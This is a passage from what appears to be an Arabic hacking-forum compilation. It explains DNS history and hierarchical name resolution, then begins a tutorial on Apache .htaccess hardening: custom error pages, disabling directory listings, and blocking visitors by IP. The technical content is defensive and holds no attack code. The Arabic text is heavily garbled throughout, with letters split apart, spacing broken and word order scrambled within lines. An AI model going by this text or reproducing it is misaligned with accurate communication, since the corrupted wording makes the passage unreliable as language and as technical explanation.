‫ﺘﻌﻤ ﻞﻟﻪ‬ ‫ﻗﻊﻟﻠﺪ ﺧﻮ لاﻟﯿﻪ وﻛﺎناﻻﺳﻢاﻟﻤﺴ‬ ‫ﺘﺎﺑﺔا ل ‪ip address‬ﻟﻬﺬااﻟﻤﻮ‬ ‫ﻗﻊ ﻣﻌﯿﻦ ﯾﺠﺐ ﻋﻠﯿﻚﻛ‬ ‫ﻟﻤﻮ‬
‫ﺘﻜﻮن ﻣﻦ ﻣﻠ ﻒاﺳﻤﻪا ل ‪ HOST FILE‬ﻮﻛﺎن ﻋﺒﺎره‬ ‫ﻗﺒ ﻞا ل ‪DNS‬ﻛﺎن ﯾ‬ ‫‪address resolution‬‬
‫ﺘﻪ‬‫ﺘﻮﻟﻰ رﻋﺎﯾ‬ ‫ﻗﻊ و ﻋﻨﻮاوﯾﻦا ل ‪ IP‬ﺎﻟﺨﺎ ﺻﻪﺑﻬﻢ وﻛﺎن ﻫﺬااﻟﻤﻠ ﻒﺗ‬ ‫ﺘ ﺲاىاﻟﻤﻮا‬ ‫ﻋﻦاﺳﻤﺎ ءاﻟﻬﻮﺳ‬
‫‪Stanford Research Institute's Network Information Center (SRI-NIC).‬ﻮ‬
‫ﻛﺎن ﻋﻠﻰ ﻫﺬااﻟ ﺮاﻋﻰ ﺎن ﯾﺠﺪ ث )‪ (UPDATE‬ﺎﻟﺠﺪو ل ﻫﺬا ﺣﻮاﻟﻰﻛ ﻞاﺳﺒﻮ ع و ﯾﻤﺪهﺑﺎﻟﻌﻨﺎوﯾﻦاﻟﺠﺪﯾﺪه و‬
‫ﺘﻢادﻣﯿﻦان ﯾﺠﺪد ﻫﻮاﻻ ﺧ ﺮ ﻣﻠﻔﻪاو ﻋﻦ ﻃ ﺮﯾ ﻖاﺗﺼﺎ ل ﺎ ل ‪FTP‬ﺑﯿﻨﻪ و‬ ‫ﺘﻰ ﻇﻬ ﺮ ت و ﻋﻠﻰاﻟﺴﯿﺴ‬ ‫ﻗﺎماﻟ‬‫ﺎﻻر‬
‫ﺘ ﺮة ﻣﻦاﻟﺰﻣﻦ رأوﻓﻲان ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ ﻏﯿ ﺮه ﻣﺠﺪﯾﺔ وﻏﯿ ﺮﻓﻌﺎﻟﺔ وﻣﻊ‬ ‫ﺑﯿﻦﻟ ﺮاﻋﻰاى‪ SRI-NIC.‬وﺑﻌﺪﻓ‬
‫ﺘ ﺮﻧ ﺖﻛ ﻞ ذﻟﻚأدىاﻟﻰ ﻇﻬﻮر ا ل ‪DNS‬ﻟﯿﻔﻌ ﻞ ذﻟﻚ‪.‬‬ ‫ﺗﻄﻮر ﺧﺪﻣﺔاﻻﻧ‬
‫ﺘ ﺤﻜﻢﻓﻰﻛ ﻞ‬ ‫ﻮا ل ‪DNS‬ﻟﯿ ﺲﻟﻪ ﻣ ﺮﻛﺰاى ‪ decentralized‬ﺎىاﻧﻪﻟﯿ ﺲﻫﻨﺎﻛﻤﻜﺎن ﻣﻌﯿﻦاو ﻧﻈﺎم ﻣﻌﯿﻦ ﯾ‬
‫ا ل ‪DNS‬ﺑ ﻞﺑﺎﻟﻌﻜ ﺲﻓﺎ ل ‪ DNS‬ﻋﺒﺎره ﻋﻦﻗﺎﻋﺪةﺑﯿﺒﺎﻧﺎ ت ﻣﻮزﻋﻪﺑﺸﻜ ﻞ ﻣﻨﻈﻢ وﺗﻮﺟﺪ ﻋﻠﻰأﻣﺜ ﺮﻣﻦ ﺳﯿ ﺮﻓ ﺮ‬
‫وﻛ ﻞ ﺳﯿ ﺮﻓ ﺮ ﻋﻠﯿﻪ ‪ DNS‬ﯾﻌ ﺮ فاﯾﻦ ﯾﺒ ﺤﺚ ﻋﻨﺪﻣﺎ ﯾ ﺮﯾﺪان ﯾ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻌﻠﻮﻣﻪ ﻣﻌﯿﻨﻪاوﻫﻮﺳ ﺖ ﻣﻌﯿﻦاو‬
‫ﯾ ﺮﯾﺪﺗﺴﺠﯿ ﻞﻟﺪوﻣﯿﻦ ﺟﺪﯾﺪ ‪.‬‬
‫ﺘﻬﺎ ‪...‬‬
‫ﻫﺬهﻛﺎﻧ ﺖ ﻣﻘﺪﻣﺔ ﻣﺒﺴﻄﺔ ﻋﻦﻫﺬهاﻟﺨﺪﻣﺔ واﻫﻤﯿ‬

‫‪ THE DNS SERVER:‬ﺧﺎدماﻟﺪياناس ‪:‬‬


‫================================‬
‫ﺘﺨﺪم‬ ‫ـ ‪DNS SERVER‬ﻫﻮ ﻋﺒﺎره ﻋﻦﻛﻤﺒﯿﻮﺗ ﺮ و ﯾﻌﻤ ﻞ ﻋﺎدﺗﺎ ﻋﻠﻰ ﻧﻈﺎم ‪ UNIX‬أوﻟﯿﻨﻜ ﺲ و ﯾﺴ‬ ‫ﺎﻟ‬
‫ﺑ ﺮﻧﺎﻣ ﺞاﻟﯿﻮﻧﻜ ﺲ ‪ BIND‬ﺎى ‪ (Berkeley Internet Name Domain).‬ﻮﻫﻨﺎﻟﻚﺑ ﺮاﻣ ﺞ ﻋﺪﯾﺪة ﻣﺜ ﻞ‬
‫ﺘﻌﻤﺎﻟﻬﻢ ك ‪ DNS SERVER‬ﻮﻟﻜﻦاﻟﻜ ﻞ ﯾﻔ ﻀ ﻞا ل‬ ‫ﺘﻮ ش‪ ,‬ﻮﻏﯿ ﺮﻫﺎاذاارادا ﺣﺪاﺳ‬ ‫ﻫﺬهﻟﻠﻮﯾﻨﺪوز واﻟﻤﺎﻛﻨ‬
‫ﺘﻜﻮنﺑ ﺮﻧﺎﻣ ﺞا ل ‪ DNS‬ﻣﻦ ﺟﺰﺋﯿﻦ ‪:‬‬ ‫‪ UNIX .‬و ﯾ‬
‫‪the name server itself (the daemon program that listens‬‬
‫)‪to port 53‬ﻮاﻻ ﺧ ﺮ ﯾﺴﻤﻰ ‪RESOLVER‬‬
‫ﺘﺢ‬ ‫ﺘﺼﻔ ﺤﻚ ﻋﻨﺪﻣﺎﺗﻄﻠﺐ ﻣﻌﻠﻮﻣﻪ ﻣﻌﯿﻨﻪﻓﻤﺜﻼ ﻋﻨﺪﻣﺎﺗﻔ‬ ‫ﺘﺠﯿﺐاﻟﻰ ﻣ‬ ‫ـ ‪NAME SERVER‬ﻫﺬا ﯾﺴ‬ ‫ﻮاﻟ‬
‫ﻗﻪ ﻣﻌﯿﻦ ﻣﺜ ﻞ ‪http://www .3asfh.com/‬ﻓﺴﯿﺴﺄ ل‬ ‫ﺘﺐاوﺗﻄﻠﺐ ﻣﻨﻪ ﻣﻮ‬ ‫ﺘ ﺮﻧ ﺖاﻛﺴﺒﻠﻮرر وﺗﻜ‬ ‫اﻻﻧ‬
‫ﻗﻢاﻻىﺑﻰاﻟﺨﺎ صﺑﻚ( ﻋﻦ ﻋﻨﻮان‬ ‫ﺘﻤﺪ ﻋﻠﻰاﺗﺼﺎﻟﻚﺑﺎﻟﺸﺒﻜﻪ و ر‬ ‫ﻗ ﺮب ‪ DNS‬ﻣﻮﺟﻮدﻟﻪ )وﻫﺬا ﯾﻌ‬ ‫ﺘﺼﻔﺢا‬ ‫اﻟﻤ‬
‫ﻗﻊاﻟﻤﻄﻠﻮب ‪http://www.3asfh.com/‬‬ ‫ا ل ‪IP‬ﻟﻬﺬااﻟﻤﻮ‬
‫ﺘﻮﯾﺎ ت‬‫ﻗﻊ و ﯾﻄﻠﺐ ﻣ ﺤ‬‫ﺘﺎج ﻫﺬاا ل ‪IP‬ﻟﯿﺠﺪاﻟﺴ ﺮﻓ ﺮاﻟﺬىﻟﺪﯾﻪ ﻫﺬااﻟﻬﻮﺳ ﺖاى ﻫﺬااﻟﻤﻮ‬ ‫ﺘﺼﻔﺢ ﯾ ﺤ‬‫ﻻن ﺎﻟﻤ‬

‫‪١٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺼﻔ ﺤﻚ‪.‬‬
‫ﻗﻊ ﻣﻦاﻟﺴ ﺮﻓ ﺮﻟﯿﻌ ﺮ ﺿﻬﺎﻟﻚﻓﻰ ﻣ‬ ‫ﺎﻟﻤﻮ‬
‫ﻗﻊاﻟﺬىﺗﻄﻠﺒﻪ‬
‫ﺘﺼﻔ ﺤﻚ ﻋﻦاﻟﻤﻮ‬
‫ـ ‪daemon program‬ﻓﻰ ﺟﺪاوﻟﻪاىﻓﻰ ذاﻛ ﺮه ﻣ‬ ‫ﻮﻗﺒ ﻞ ﻫﺬا ﺳﯿﺴﺄ لاﻟ‬
‫ﺘﻢاﻟﻌﻤﻠﯿﻪ‪.‬‬
‫ﺘﻘ ﻞاﻟﻰ ﻣﺎ ﺳﺒ ﻖ ﺷ ﺮ ﺣﻪ وﻫﻜﺬاﺗ‬
‫ﻓﺄذاﻟﻢ ﯾﺠﺪه ﯾﻨ‬

‫‪THE TREE INFORMATION:‬‬


‫=========================‬
‫ـ ‪ DNS‬ﺎﻟﻤ ﺤﻠﻲ‬ ‫ﺘﺼﻔﺢ ﺣﻘﻚ و ﻻ ﯾﺠﺪهﻓﻰاﻟ‬ ‫ﻗﻢ ‪ IP‬ﻣﻌﯿﻦ ﻣﻦاﻟﻤ‬ ‫ﺎﻻنﺑﻌﺪاناﺗﻘﻔﻨﺎ ﻋﻠﻰاﻧﻚ ﻋﻨﺪﻣﺎﺗﻄﻠﺐ ر‬
‫ﺘﻮى ﻋﻨﻪﻟﯿﺠﺪه واذاﻟﻢ ﯾﺠﺪهﻓﻰ‬ ‫اىاﻟﺨﺎ صﺑﻚ ﺳﻮ ف ﯾﺴﺄ لا ل ‪ DNS SERVER‬ﺎﻻﻋﻠﻰ ﻣﻨﻪﻓﻰاﻟﻤﺴ‬
‫ﻗ ﻞاﻟﻰاﻻﻋﻠﻰﻓﻰ‬ ‫ﺘﻮىاﻋﻠﻰ واﻋﻠﻰ وﻫﻜﺬا ﯾﺴﯿ ﺮاﻟﺒ ﺤﺚ ﻣﻦاﻻ‬ ‫ﺘﻘ ﻞﻟﻠﺒ ﺤﺚﻓﻰ ﻣﺴ‬‫ﺘﻮىاﻋﻠﻰﻓﯿﻨ‬ ‫ﻣﺴ‬
‫ﺘﻮﯾﺎ تا ل‪DNS SERVERS.‬‬ ‫ﻣﺴ‬
‫ﺘ ﺞ وﺟﻮد ﺷﺠ ﺮهاﺗﺼﺎ ل و ﻣﻌﻠﻮﻣﺎ ت وﻟﻜﻦﻛﯿ ﻒﺗﻌﻤ ﻞﺑﺎﻟ ﻀﺒﻂ دﻋﻮﻧﺎ‬ ‫ﺘﻨ‬‫ﺘﯿﺠﻪ ﻣﻦ ﻫﺬااﻻﺗﺼﺎ لﻓﺴﻨﺴ‬ ‫ﻮ ﻃﺒﻌﺎ ﻧ‬
‫ﻧﺄ ﺧﺬ ﻣﺜﺎ ل ‪:‬‬
‫ﺘ ﺮﻧ ﺖاى ﺣﺴﺐ‬ ‫ﺘﻤﺪ ﻋﻠﻰاﺗﺼﺎﻟﻚﺑﺎﻻﻧ‬ ‫ـ ‪ ISP‬ﺎﻟﺨﺎ صﺑﻚﻛﺎن ﻣﺜﻼ ‪ isp.co.uk‬ﻮ ﻫﺬا ﯾﻌ‬ ‫ﻟﻮﻓ ﺮ ﺿﻨﺎاناﻟ‬
‫ـ ‪ISP's DNS server's‬‬ ‫اﻟﺸ ﺮﻛﻪ واﻟﺴ ﺮﻓ ﺮ ﺎﻟﺬىﺗﺸﺒﻚ ﻋﻠﯿﻪﻓﻤﻦاﻟﻄﺒﯿﻌﻰ ﻃﺒﻌﺎان ﯾﻜﻮناﻟ‬
‫ـ ‪DNS‬ﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦ ‪IP‬‬ ‫‪hostname‬ﻣﺜ ﻞ ﻫﺬا ‪ dns.isp.co.uk‬ﻮاﻻنﻓﺎﻟﻨﻔ ﺮ ضاﻧﻚ ﺳﺄﻟ ﺖ ﻫﺬااﻟ‬
‫ﺎﻟﺨﺎ ص ب ‪ http://www .3asfh.com/‬ﻣﺜﻼﻓﺴﯿﻘﻮمﻫﺬاا ل ‪ dns.isp.co.uk‬ﺑﺎﻟﺒ ﺤﺚﻓﻰ ﺟﺪاوﻟﻪ‬
‫ﺘﻮىاﻋﻠﻰ ﻣﻦا ل ‪DNS‬‬ ‫ﺘﻘ ﻞﻛﻤﺎﻗﻠﻨﺎاﻟﻰ ﻣﺴ‬ ‫اﻟﻤ ﺤﻠﯿﻪاﻟﻤﺨﺬﻧﻪﻓﻰاﻟﺬاﻛ ﺮه ﻋﻨﺪهﻓﯿﺠﺪﻫﺎ و ﺎذاﻟﻢ ﯾﺠﺪﻫﺎﻓﺴﯿﻨ‬
‫ﺘﻐﯿﯿ ﺮ ﻣﻜﺎناﻟﺒ ﺤﺚﻛﻠﯿﺎ‬‫ﺘﻮىاﻻﻋﻠﻰﻓﻌﻠﯿﻪان ﯾﻘﻮمﺑ‬ ‫‪SERVER‬ﻟﯿﺒ ﺤﺚﻓﯿﻪ واذاﻟﻢ ﯾﺠﺪهاﯾ ﻀﺎﻓﻰاﻟﻤﺴ‬
‫ﻓﻤﺜﻼ ﻣﻦ ‪ dns.isp.co.uk‬ﺎﻟﻰ ‪ some-organization.org.uk‬ﺎو ‪school.edu.uk,‬‬
‫‪university.ac.uk, england.gov.uk, airforce.mil.uk‬ﻮاﻟ ﺦ وﻫﻨﺎكاﻣﺜﻠﻪﻛﺜﯿ ﺮا ﻃﺒﻌﺎ و‬
‫ﺘﺼﻔﺢاﻟﻰ‬ ‫ﺘﺎ حﻟﻪاﻟﺒ ﺤﺚﻓﯿﻬﺎﻓﺴﯿ ﺮﺟﻊاﻟﻤ‬ ‫ﺘﻬﻰ ب ‪ UK‬واذاﻟﻢ ﯾﺠﺪهاﯾ ﻀﺎﻓﻰﻛ ﻞاﻻﻣﺎﻛﻦاﻟﻤ‬ ‫ﻛ ﻞ ﺷﺊ ﯾﻨ‬
‫ﻗﻊ‬ ‫ﺘﻮى ﻋﻠﻰﻛ ﻞ ﻋﻨﺎوﯾﻦا ل ‪ IP‬ﻋﻠﻰﻛ ﻞﻟﻠﻤﻮا‬ ‫اﻛﺒ ﺮ ‪ DNS‬ﻣﻮﺟﻮد ﻋﻠﻰاﻟﺸﺒﻜﻪ واﺳﻤﻪا ل ‪ROOT‬ﻓﻬﻮ ﯾ ﺤ‬
‫ـ ‪DNS‬ﺑ ﺤﺜﺎ ﻋﻦ‬ ‫ﺘﻨﻘ ﻞاﻟ‬‫ﺘﺴﻠﺴﻠﯿﺔ ﯾ‬‫ﺎﻟﻤﻮﺟﻮده ﻋﻠﻰاى ‪ DOMAIN NAME‬ﻮﻫﺬﻛﺎ ﺣﺴﺐﻫﺬهاﻟﻌﻤﻠﯿﺔاﻟ‬
‫اﻟﺪوﻣﯿﻦ ‪.‬‬

‫ﻗﻊ ﻫﺬااﻟﺪوﻣﯿﻦ ؟‬
‫ﻗﻊاوﺗ ﺤﺪﯾﺪ ﻣﻮ‬
‫ـ ‪DNS‬ﻓﻲاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻟﻤﻮ‬
‫ﺘﻰ ﯾﻔﺸ ﻞاﻟ‬
‫ﻣ‬
‫======================================‬
‫أﺗﻤﻨﻰانﺗﻜﻮناﻻﺟﺎﺑﺔﻗﺪ وﺻﻠ ﺖﻷﻓﻬﺎﻣﻜﻢﻗﺒ ﻞانأذﻛ ﺮﻫﺎ وﻫﻲاﻣﺎاﻓﻲ ﺣﺎﻟﺔ ﻋﺪم وﺟﻮدﻫﺬااﻟﺪوﻣﯿﻦ‬
‫ﺘﻰ ﯾﺼ ﻞﻟﻠﺠﺬز ‪ ROOT‬وﯾﺒ ﺤﺚﻓﻲﻛ ﻞاﻻيﺑﯿﺎ ت‬ ‫ﺑﺎﻻﺻ ﻞ وﺳﯿﻄﻮ لاﻟﺒ ﺤﺚ ﻻﻧﻬﺎ ﺳﯿﺒ ﺤﺚﻓﻲﻛ ﻞاﻟﻤ ﺮا ﺣ ﻞ ﺣ‬
‫ﺘﻤ ﺮ‬
‫ﻗﺪ ﯾﺴ‬ ‫ﺘﻜﻮناﻻﺟﺎﺑﺔ ‪ address could not be found‬و‬ ‫أواﻟﺪوﻣﯿﻨﺎ تاﻟﻤﺨﺰﻧﺔﻓﯿﻪ وﻣﻦﺛﻢ ﺳ‬
‫اﻟﺒ ﺤﺚ ﻣﺎ ﯾﻘﺎرب ‪٢٠ – ١٥‬ﺛﺎﻧﯿﺔ‬
‫اﻟ ﺤﺎﻟﺔاﻷ ﺧ ﺮى ‪:‬‬
‫ﺘﺼﻔ ﺤﻚﺑﻘﺪاناﻻﺗﺼﺎ ل ﻣﻊا ل ‪ DNS‬ﺎى ﻋﻤﻠﯿﻪ‪TIMED OUT .‬‬ ‫ﺘﯿﺠﻪ ﻃﻮ لاﻟﺒ ﺤﺚﻓﯿﻘﻮم ﻣ‬ ‫ﻧ‬
‫ﺘﺼﻔ ﺤﻚ ‪...‬‬
‫ﺘﺼﻔﺢ ﻋﻠﻰ ‪ REFRESH‬ﺎو ‪ RELOAD‬ﻃﺒﻌﺎ ﺣﺴﺐ ﻣ‬ ‫ﻮﻓﻰ ﻫﺬهاﻟ ﺤﺎﻟﻪ ﻧ ﻀﻐﻂﻓﻰاﻟﻤ‬

‫‪١٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺷﺮح ﻣﻠﻒ ‪" htaccess‬‬

‫‪$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪BSD-r00t :‬‬
‫‪$$$$$$$$$$$$$$‬‬
‫‪..... htaccess‬‬

‫|‬ ‫ـﺔ‬‫ـ‬‫ـ‬‫| * ﻣﻘﺪﻣ‬


‫|‬ ‫| *اﻫﻤﯿﺔ ﻣﻠ ﻒ ‪htaccess.‬‬
‫|‬ ‫| *ﻛﯿﻔﯿﺔ ﻋﻤ ﻞ ﻣﻠ ﻒ ‪htaccess.‬‬
‫|‬ ‫| * ﻋﻤ ﻞ ﺻﻔ ﺤﺎ ت ‪ error‬ﺧﺎ ﺻﺔ‬
‫ﺘﻮﯾﺎ تاﻟﻤﺠﻠﺪاﻟﺬي ﻻ ﯾﻮﺟﺪﺑﻪ ‪| index‬‬ ‫| * ﻣﻨﻊ ﻋ ﺮ ض ﻣ ﺤ‬
‫|‬ ‫ﻗﻊ ﻻﺷﺨﺎ ص ﻣﻌﯿﻨﺔ‬ ‫| * ﻣﻨﻊ‪/‬اﺗﺎ ﺣﺔ د ﺧﻮ لاﻟﻤﻮ‬
‫|‬ ‫ﺘﺢﻟﯿﻨﻚﻟﻠﯿﻨﻚا ﺧ ﺮ‬ ‫| *ﺗ ﺤﻮﯾ ﻞ ﻣﻦ ﯾ ﺤﺎو لﻓ‬
‫|‬ ‫| * ﻋﻤ ﻞاﻟﻤﻠ ﻒ ‪.htpasswd‬‬
‫|‬ ‫| *اﻟ ﺤﻤﺎﯾﺔﺑﻮاﺳﻄﻪ ‪htaccess.‬‬
‫|‬ ‫| * ﻣﻨﻊاﻇﻬﺎراﻟﻤﻠ ﻒ ‪htaccess.‬‬
‫|‬ ‫ﺘﺨﺪﻣﯿﻦﻓﻲاﻟﻤﻠ ﻒ‬ ‫| *ا ﺿﺎﻓﺔ ﻣﺴ‬
‫|‬ ‫ﺘﺪادا ﺧ ﺮ‬
‫| * ﺟﻌ ﻞاﻟﺼﻔ ﺤﺎ تﺗﻈﻬ ﺮﺑﺎﻣ‬
‫‪--------------------------------------------------‬‬

‫ـﺔ‬‫ـ‬‫ـ‬
‫* ﻣﻘﺪﻣ‬
‫‪------------‬‬
‫ﻗﻊ‬
‫ﻗﻊ واﻏﻼ قﺑﻌ ﺾاﻻﺟﺰا ءﻓﯿﻪﺑﻜﻠﻤﺔ ﺳ ﺮ ‪ ،‬و ﻣﻨﻊﺑﻌ ﺾاﻟﻨﺎس ﻣﻦ د ﺧ ﻞاﻟﻤﻮ‬ ‫ﻣﻦاﻫﻢ وﺳﺎﺋ ﻞ ﺣﻤﺎﯾﺔاﻟﻤﻮا‬
‫ﺘﺨﺪاماﻟﻤﻠ ﻒ ‪ htaccess.‬واﻟﺬي ﯾﻤﻜﻦ ﻋﻤ ﻞاﻟﻜﺜﯿ ﺮ واﻟﻜﺜﯿ ﺮﺑﻪ ‪.‬‬ ‫واﻟﺴﻤﺎ حﻟﻐﯿ ﺮﻫﻢﺑﺎﻟﺪ ﺧﻮ ل ‪ ..‬ﻫﻮاﺳ‬
‫و ﻫﺬااﻟﻤﻠ ﻒ ﻣﺨﻔﻲ و ﻣ ﺤﻤﻲﺑﻜﻠﻤﺔ ﺳ ﺮ ‪.‬‬

‫*اﻫﻤﯿﺔ ﻣﻠ ﻒ ‪htaccess.‬‬
‫‪-----------------------‬‬
‫‪ -١‬ﺣﻤﺎﯾﺔاي ﺟﺰ ءﻓﯿﻪﺑﻜﻤﻠﺔ ﺳ ﺮ‬
‫‪ -٢‬ﻋﻤ ﻞ ﺻﻔ ﺤﺎ ت ‪ error‬ﺧﺎﺻﺔﺑﻚ‬
‫ﺘﻮﯾﺎ تاﻟﻤﺠﻠﺪاﻟﺬي ﻻ ﯾﻮﺟﺪﺑﻪ ‪index‬‬ ‫‪ -٣‬ﻣﻨﻊ ﻋ ﺮ ض ﻣ ﺤ‬
‫ﻗﻊ ﻻﺷﺨﺎ ص ﻣﻌﯿﻨﺔ‬ ‫‪ -٤‬ﻣﻨﻊ‪/‬اﺗﺎ ﺣﺔ د ﺧﻮ لاﻟﻤﻮ‬
‫ﺘﺪادا ت ﻏﯿ ﺮ ‪.. html , .asp.‬‬ ‫‪ -٥‬ﺟﻌ ﻞ ﺻﻔ ﺤﺔاﻟﺒﺪاﯾﺔﺑﺄﻣ‬
‫ﺘﺢﻟﯿﻨﻚﻟﻠﯿﻨﻚا ﺧ ﺮ‬ ‫‪-٦‬ﺗ ﺤﻮﯾ ﻞ ﻣﻦ ﯾ ﺤﺎو لﻓ‬

‫*ﻛﯿﻔﯿﺔ ﻋﻤ ﻞ ﻣﻠ ﻒ ‪htaccess.‬‬
‫‪---------------------------‬‬
‫ﯾﻤﻜﻨﻚ ﻋﻤ ﻞ ﻫﺬااﻟﻤﻠ ﻒﺑﻮاﺳﻄﻪاي ﻣ ﺤ ﺮر ﻧﺼﻮ ص ﻣﺜ ﻞاﻟﻨﻮ تﺑﺎد "‪ "Notepad‬ﻋﻦ ﻃ ﺮﯾ ﻖ ﻋﻤ ﻞﻟﻠﻤﻠ ﻒ‬
‫ﺘﺪاده ‪txt.‬ايانﻟﯿ ﺲ ﻫﻨﺎكاﺳﻢ‬ ‫ﺣﻔﻆﺑﺎﺳﻢ و ﻧ ﺤﻔﻆاﻟﻤﻠ ﻒﺑﻬﺬااﻻﺳﻢ ‪ htacces.‬ﻋﻠﻰان ﯾﻜﻮنﻟﯿ ﺲاﻣ‬
‫ﺘﻨﺼﯿ ﺺﻓﻲاﺳﻢاﻟﻤﻠ ﻒ ‪. -‬‬ ‫ﺘﻲاﻟ‬
‫ﺘﻄﯿﻊ ذﻟﻚا ﺣﻔﻆاﻟﻤﻠ ﻒﺑﺎﺳﻢ "‪ - "htaccess.‬ﻋﻼﻣ‬ ‫ﻟﻠﻤﻠ ﻒ ‪،‬اذاﻟﻢﺗﺴ‬

‫‪١٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫* ﻋﻤ ﻞ ﺻﻔ ﺤﺎ ت ‪ error‬ﺧﺎ ﺻﺔ‬
‫‪------------------------‬‬
‫ﻗﻊ‬ ‫ﻗﻊ ﯾﻈﻬ ﺮﺑﺸﻜ ﻞاﻓ ﻀ ﻞﻛﻤﺎاﻧﻪ ﻋﻨﺪ ﻣ ﺤﺎوﻟﺔاي ﺷﺨ ﺺ ﻋﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰاﻟﻤﻮ‬ ‫واﻟﻔﺎﺋﺪة ﻣﻨﻬﺎﻫﻮاناﻟﻤﻮ‬
‫ﺘﻄﺒﯿ ﻖﻛ ﻞﺛﻐ ﺮه‬
‫ﻗﻊﺑﻪﻛ ﻞاﻟﺜﻐ ﺮا ت و ذﻟﻚ ﻻن ﻃ ﺮﯾﻘﺔ ﻋﻤ ﻞاﻟﺴﻜﺎﻧ ﺮ ﻫﻲاﻧﻪ ﯾﻘﻮمﺑ‬ ‫ﺳﻮ ف ﯾﻈﻬ ﺮانﻛﺎناﻟﻤﻮ‬
‫ﺘﯿﺠﻪ ‪.‬‬ ‫ﻗﻊ و ﯾ ﺮ ﺻﺪاﻟﻨ‬‫ﻋﻠﻰاﻟﻤﻮ‬
‫ﻗﻊ ﻋﻠﯿﻪﻫﺬهاﻟﺜﻐ ﺮه ‪.‬‬ ‫ﻓﺎذاﻛﺎنﻫﻨﺎكايﺗﻐﯿ ﺮ ﯾﻈﻬ ﺮﻟﻚﻛﺄناﻟﻤﻮ‬
‫و ﯾﻤﻜﻨﻚ ﻋﻤ ﻞ ﺻﻔ ﺤﺎ تا ل ‪error‬اﻟﺨﺎﺻﻪ ك ﻋﻦ ﻃ ﺮﯾ ﻖ ‪-:‬‬
‫أ‪-‬ﺗﺼﻤﯿﻢ ﺻﻔ ﺤﺎ تا ل ‪error‬اوﻻ‬
‫ﻗﻊ‬ ‫ب‪-‬ﺗ ﺤﻤﯿ ﻞاﻟﺼﻔ ﺤﺎ ت ﻋﻠﻰاﻟﻤﻮ‬
‫ﺘﺎﺑﻲﻓﻲاﻟﻤﻠ ﻒ ‪htaccess.‬‬ ‫ج‪-‬ا ﺿﺎﻓﻪاﻟﺴﻄ ﺮاﻟﻜ‬
‫‪ErrorDocument error_num‬‬
‫‪directory_file‬‬
‫ﻗﺎم ﻣﻮﺟﻮدﺑﺎﻟﺴﻔ ﻞ " و ‪directory_file‬ﻫﻮ ﻣﻜﺎن‬ ‫ﻗﻢاﻟﺨﻄﺎ "اﻻر‬ ‫ﺑ ﺤﯿﺚ ﯾﻜﻮن ‪error_num‬ﻫﻮ ر‬
‫ﺘﺼﻤﯿﻤﻬﺎ ‪.‬‬ ‫ﺘﻲﻗﻤ ﺖﺑ‬ ‫ﺻﻔ ﺤﻪا ل ‪error‬اﻟ‬
‫‪ErrorDocument 404‬‬ ‫ﻣﺜﺎ ل ‪:‬‬
‫‪/errors/nfound.html‬‬
‫ﻗﺎﻣﻬﺎ ‪- :‬‬‫ا ل ‪ errors‬وار‬
‫‪-----------------------‬‬
‫| ‪| Bad Syntax | ٤٠٠‬‬
‫‪-----------------------‬‬
‫| ‪| Unauthorized | ٤٠١‬‬
‫‪-----------------------‬‬
‫|‬ ‫|‪Not Used | ٤٠٢‬‬
‫‪-----------------------‬‬
‫| ‪| Forbidden | ٤٠٣‬‬
‫‪-----------------------‬‬
‫| ‪| Not Found | ٤٠٤‬‬
‫‪-----------------------‬‬

‫ﺘﻮﯾﺎ تاﻟﻤﺠﻠﺪاﻟﺬي ﻻ ﯾﻮﺟﺪﺑﻪ ‪index‬‬ ‫* ﻣﻨﻊ ﻋ ﺮ ض ﻣ ﺤ‬


‫‪-----------------------------------------------------‬‬
‫ﻗﻊﺑﺴ ﺮد ﺟﻤﯿﻊ‬
‫ﺘﺢاي دﻟﯿ ﻞ ﻋﻠﯿﻬﺎ و ﻻ ﯾﻜﻮنﺑﻪ ﻣﻠ ﻒ ‪ index‬ﯾﻘﻮماﻟﻤﻮ‬ ‫ﻗﻊ ﻋﻨﺪ ﻣ ﺤﺎوﻟﺔﻓ‬ ‫ﺑﻌ ﺾاﻟﻤﻮا‬
‫ﺘﯿﻦ ‪-:‬‬‫ﺘﻮﯾﺎ تﻫﺬااﻟﺪﻟﯿ ﻞ وﻟ ﺤ ﻞ ﻫﺬهاﻟﻤﺸﻜﻠﻪﺗﻮﺟﺪ ﻃ ﺮﯾﻘ‬ ‫ﻣﺤ‬
‫أ‪ -‬و ﺿﻊ ﻣﻠ ﻒ ‪index‬ﻓﻲﻛ ﻞاﻟﻤﺠﻠﺪا ت " وﺑﺎﻟﻄﺒﻊ ﻫﺬا ﺻﻌﺐ ﺟﺪا "‬
‫ﺘﺎﻟﻲﻓﻲاﻟﻤﻠ ﻒ ‪-:‬‬‫ﺘﺨﺪاماﻟﻤﻠ ﻒ ‪ htaccess.‬ﻋﻦ ﻃ ﺮﯾ ﻖا ﺿﺎﻓﻪاﻟﺴﻄ ﺮاﻟ‬ ‫ب‪-‬ﺑﺎﺳ‬
‫‪Options -Indexes‬‬

‫ﻗﻊ ﻻﺷﺨﺎ ص ﻣﻌﯿﻨﺔ‬ ‫* ﻣﻨﻊ‪/‬اﺗﺎ ﺣﺔ د ﺧﻮ لاﻟﻤﻮ‬


‫‪----------------------------------------‬‬

‫‪١٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊﺑﻌﺪ ﻣﻌ ﺮﻓﺔاﻻيﺑﻲاﻟﺨﺎ ﺻﻪﺑﻪ و‬ ‫ﺘﺨﺪاماﻟﻤﻠ ﻒ ‪ htaccess.‬ﻣﻨﻊ ﺷﺨ ﺺ ﻣﻌﯿﻦ ﻣﻦ د ﺧﻮ لاﻟﻤﻮ‬ ‫ﯾﻤﻜﻨﻚﺑﺎﺳ‬


